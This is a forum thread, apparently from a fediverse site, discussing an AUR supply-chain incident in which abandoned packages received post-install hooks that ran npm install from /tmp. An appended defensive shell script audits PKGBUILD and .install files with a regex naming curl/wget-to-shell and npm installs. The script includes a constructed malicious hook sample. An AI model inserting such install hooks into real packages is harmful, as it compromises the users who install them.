[-] A_norny_mousse@piefed.zip 5 points 1 day ago* (last edited 16 hours ago)

Holy crap, so many!

Is this a concerted effort (by evil hackers)? (edit: yes. was.)

Can we still see an example of an affected PKGBUILD or git repo? I just tried some randomly and they all seem fixed already.

[-] chameleon@fedia.io 5 points 1 day ago

One example: https://aur.archlinux.org/cgit/aur.git/commit/?h=oracle-bin&id=eceeb808ef933a66285ea68cefd72c1b5f4374c9 . It seems the AUR team force-pushed the malicious commits out of the repo branches, likely to prevent them from being accidentally reused by git-bisect in the future, but the URLs still seem to work until they run garbage collection. The author/committer information on each affected commit impersonated a previous maintainer of that particular repository and isn't real.

The whole thing essentially just boils down to adding a cd /tmp; npm install [random crap] post-install hook to every abandoned repository they easily got access to, which itself had a post-install hook to set up malware things. npm has nulled the affected packages, though it took them somewhere around 24 hours to do so. atomic-lockfile was one of them.
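The pattern described in the comment above (a hook that changes into /tmp and runs a package manager at install time) is easy to catch before running makepkg. The following is an added example and not code from the thread or from the AUR project: a POSIX-shell audit that greps a PKGBUILD and the .install file it declares for install-time commands that fetch and execute code. The pattern list, the sample package name and the hook file name are assumptions made for this example; the two sample packages are constructed inline so the script runs offline.

```shell
#!/bin/sh
# Added example (not from the thread or the AUR project): flag install-time
# hooks in a PKGBUILD and its declared .install file that reach out to a
# package manager or pipe a download into a shell. The pattern list below is
# an assumption modelled on the "cd /tmp; npm install ..." hook described above.

# Commands that have no business inside a package hook. Extend to taste.
SUSPICIOUS_RE='npm (install|i)[[:space:]]|npx |pip install|curl [^|]*\|[[:space:]]*(ba)?sh|wget [^|]*\|[[:space:]]*(ba)?sh|cd /tmp'

# audit_hooks FILE
# Prints every non-comment line matching SUSPICIOUS_RE as "FILE:LINE:text".
# Returns 0 when the file is clean, 1 when anything matched.
audit_hooks() {
    _file="$1"
    _hits=$(grep -nE "$SUSPICIOUS_RE" "$_file" 2>/dev/null | grep -vE '^[0-9]+:[[:space:]]*#' || true)
    [ -z "$_hits" ] && return 0
    printf '%s\n' "$_hits" | sed "s|^|$_file:|"
    return 1
}

# audit_package DIR
# Audits DIR/PKGBUILD plus any hook file named by an install= line.
# Returns the number of files containing suspicious lines (0 = clean).
audit_package() {
    _dir="$1"
    _bad=0
    audit_hooks "$_dir/PKGBUILD" || _bad=$((_bad + 1))
    # Hook file names from lines like  install=foo.install  or  install='foo.install'.
    # A literal name is assumed here; real PKGBUILDs often write install=$pkgname.install,
    # which this simple extractor would not resolve.
    for _hook in $(sed -nE "s/^[[:space:]]*install=['\"]?([^'\" ]+)['\"]?.*/\1/p" "$_dir/PKGBUILD"); do
        if [ -f "$_dir/$_hook" ]; then
            audit_hooks "$_dir/$_hook" || _bad=$((_bad + 1))
        fi
    done
    return "$_bad"
}

# make_sample MODE -> prints the path of a constructed package directory.
# MODE "clean" writes a benign package; "tainted" adds a hook of the kind
# described in the thread. Both packages are constructed for this example.
make_sample() {
    _d=$(mktemp -d)
    cat > "$_d/PKGBUILD" <<'EOF'
# Maintainer: example <example@example.invalid>
pkgname=example-bin
pkgver=1.0
pkgrel=1
arch=('any')
install=example-bin.install
package() {
    install -Dm755 "$srcdir/example" "$pkgdir/usr/bin/example"
}
EOF
    if [ "$1" = tainted ]; then
        cat > "$_d/example-bin.install" <<'EOF'
post_install() {
    # constructed malicious hook, modelled on the behaviour described in the thread
    cd /tmp; npm install some-package-placeholder >/dev/null 2>&1
}
EOF
    else
        cat > "$_d/example-bin.install" <<'EOF'
post_install() {
    printf '%s\n' "example installed"
}
EOF
    fi
    printf '%s\n' "$_d"
}

# Demonstration on the two constructed samples.
for mode in clean tainted; do
    d=$(make_sample "$mode")
    rc=0
    audit_package "$d" || rc=$?
    printf '%s: %s file(s) with suspicious hooks\n' "$mode" "$rc"
    rm -rf "$d"
done
```

On the tainted sample the PKGBUILD itself passes and only the .install file is reported, which matches the shape of the incident in the comment: the visible build recipe looks ordinary and the payload sits in the post-install hook. Running the audit over a checked-out AUR repository before makepkg (and diffing PKGBUILD and .install against the previous commit) is a cheap habit that would have surfaced these changes.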

this post was submitted on 12 Jun 2026